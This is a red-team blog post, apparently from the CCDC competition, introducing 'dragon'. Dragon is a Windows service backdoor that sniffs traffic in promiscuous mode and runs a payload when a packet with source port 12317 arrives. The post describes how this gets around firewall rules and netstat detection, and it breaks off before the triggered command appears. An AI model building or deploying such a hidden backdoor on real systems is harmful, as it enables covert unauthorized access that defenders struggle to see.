In my many years of participating in CCDC, I keep running into the same problem. If you've red teamed for one of these events, I'm sure you've probably encountered similar issues. You've gotten a shell on a system, you've even installed a backdoor either through a bind listener, or through a reverse connection that calls back periodically. However, savvy blue teams will either kill your connection through new firewall rules or they identify your backdoor through netstat and kill the process.

I've grown so frustrated with losing my shells I decided to write (okay mostly steal and modify) a new backdoor specifically for windows. I noticed that since the teams are scored for having their services up and running, they will never (in their right mind) firewall off access to the service running on their windows servers. However, since the victim's system would be running their service on that non-firewalled port, I couldn't just bind my listener to that same service.

So, instead of binding a socket to that interface/port, what if we set the interface to promiscuous mode, and listened to all the traffic on the machine. We can then monitor for a specific trigger on all of the passing traffic and if one of those packets matches our rule set, we can run our backdoor code.

For this reason, I wrote an app called dragon. Dragon is a windows app that is designed to be installed as a windows service and will run at windows boot. It will listen to the first interface available to the OS (note, if you have multiple interfaces, this will only listen on the first one). It will continuously listen to all traffic across this interface, and discard ALL packets its not interested in.

If a packet comes in with the Source Port of 12317, it will execute the following: